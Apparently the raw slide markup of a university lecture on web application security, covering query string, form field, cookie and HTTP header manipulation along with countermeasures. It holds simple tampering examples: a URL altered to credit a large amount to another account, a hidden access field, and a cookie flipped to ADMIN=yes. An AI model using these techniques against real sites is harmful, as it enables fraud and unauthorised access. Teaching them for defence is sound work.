        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CCD0C193-4974-4A1F-9C63-07D595E30D66}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2EA979-414F-AA70-5C10-5B970F8DD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43FE7-183F-EB98-5CEE-FB7413A6051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819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3DA9-FD72-73F6-E8F2-31B8C6527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D48F3-0D9B-BB55-681C-CA85E41B8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C6D02-85EE-8B1F-FF7B-7D2A13B072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019BA1-610E-1EB9-EBE4-584BDE7724A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{701AA87F-28D4-4BF0-B81F-877A89DFD5AC}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32D05FD4-5783-8059-F516-6A13942FE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C76D1-2E2C-DFAF-91C7-FEB16572643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7367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81E3-90BF-0238-374B-EE6EFD0DEC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47E43C-0381-BAC7-431E-DD7821CB9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20F1A-A7F4-7BBB-7DFC-3FB0D7A12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A45A4-2933-EB1B-2239-F6FFBBF25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95CCA-CC62-B8CE-1FF0-C0F43AEFC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E97A9-196B-74B9-5544-B7E78FF13D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8A9F1F3-208B-49A3-B337-9C8ACEB3E0E1}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F95DFC55-DD8E-0736-601D-9A1F3C0771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9A917-C32B-0B12-8001-3B94CED1074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75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11C5-DB6B-A1F3-3131-12D063970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30602-F036-54FF-A7D2-98D62649B233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{27AF6CA6-7293-4AA2-A0E0-A3BF4416E786}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73421FFF-19C1-9132-2B8D-AFCBDC87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3CDCB2-39DF-29BC-8E6E-886EB801A3F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2130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7A5F0-9184-78D3-910F-034E5BEDE1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{98D87016-7BCD-46FB-8EE3-AB6C369108B4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D606B8A8-85DF-D78D-7749-DB3DE16EC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E12690-EAD7-3306-A41D-8D7A1AE8675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117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0FFB-26EE-3314-6015-62A8E8A3A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C0F1B-0065-49E4-2CF7-0B92EF37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C682A8-E119-E798-B89B-B26208E69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34F22-3DEB-4954-AAB7-643A8112989D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A1547011-1FFC-4EF8-9A2E-53B4AD2ADBD4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC464A9-AC71-40D7-8120-99EC48483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91B26-A925-F9DF-9C4A-CDD77B70BC6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6472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0F78-A977-3658-4E20-F7AC2F896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AF1A58-4886-FB66-9A0E-966656515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26E53-95FB-610F-55AE-16ED0CB6A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C2F96-6A19-0A92-94D6-1363C4862246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9562EB47-45B4-4EF5-A743-B4885DD2F060}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557B085D-8981-C474-83D9-432E5BABF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30379-1A1C-08DB-F16F-40E9130DEA9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375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0DA3B-BF74-FFE5-4119-29D26DB21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E4A019-EC53-B388-BC3D-47BFC3C51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6E32D-BFA2-7AE3-C03C-948756C54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5/1/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{428C8AB2-3B70-3C2E-0EFC-1B88CFE0D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7382B0D-552B-33BD-8DB2-CD0E9B433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64662981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cgisecurity.com/owasp/html/ch11s0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royhunt.com/owasp-top-10-for-net-developers-part-6/"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 descr="Computer script on a screen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE17748-54E6-6441-8DA7-3E70F628F6DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="4347" t="4898" r="15413"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="8668492" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rectangle 4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A8469B-3E7D-1818-6F1B-34AFEABEB1C2}"/>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 IT  Application and Data Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1"/>
              <a:t>Unit V</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FE6128-96B9-7343-7B51-739711C03F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="4872922"/>
            <a:ext cx="4023360" cy="1208141"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>- Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Gopal Rawat</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41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200" b="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class of attack that relies on the modification of the parameter data sent between the client and Web application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Top parameter manipulation threats :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>● Query string manipulation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>● Form field manipulation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>● Cookie manipulation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>● HTTP header manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Parameter Manipulation (cgisecurity.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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5966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Query String Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>query string values passed by HTTP GET from client to server displayed in the browser’s URL address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.victim.com/example?accountnumber=12345&amp;debitamount=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   http://www.victim.com/example?accountnumber=67891&amp;creditamount=999999999</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8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92F4E60-7F6C-58E4-D395-C6ACCED1A68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="939016" y="3820637"/>
            <a:ext cx="5157314" cy="2672238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC1F1FA-9EF8-39F7-A024-117C1F17BC10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6785790" y="4154856"/>
            <a:ext cx="4255797" cy="1841450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330704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Query String Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Countermeasures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoid using query string parameters that contain sensitive data or data that can </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>influence the security logic on the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use a session identifier to identify the client and store sensitive items in the session store on the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Choose HTTP POST instead of GET to submit forms. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypt query string parameters.</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404286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Form Field Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200"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7170" name="Picture 2" descr="HTML Forms: From Basics to Style: Layouts | HTML Goodies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6CB5E4A-6622-196E-B3C0-1BCA5586F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03" y="2471738"/>
            <a:ext cx="8728822" cy="243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3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Form Field Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>values of HTML form fields are sent in plaintext to the server using the HTTP POST protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>include visible and hidden form fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>easily modified, client-side validation routines bypassed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>applications that rely on form field input values to make security decisions on the server are vulnerable to attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;input name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>masteraccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" type="hidden" value="N"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200"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44065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Form Field Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Countermeasures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- avoid using hidden form fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- use session identifiers to reference state maintained in the state store on the server</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3932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Cookie Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Cookies are susceptible to modification by the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>gain unauthorized access to a Web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Original Cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie: lang=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-us; ADMIN=no; y=1; time=10:30GMT;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Cookie Modified by an Attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie: lang=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-us; ADMIN=yes; y=1; time=12:30GMT;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>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67003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Cookie Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="22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Countermeasures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encrypt or use an HMAC with the cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pass data over SSL</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6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E08EEA-BB9F-EDAC-DEE4-E29DFE81EFCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1770" r="2524"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2113458"/>
            <a:ext cx="6798786" cy="3099574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223994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HTTP Header Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>HTTP headers pass information between the client and the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>client constructs request headers while the server constructs response headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>application relying on request headers to make a decision are vulnerable to attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected HTTP header injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
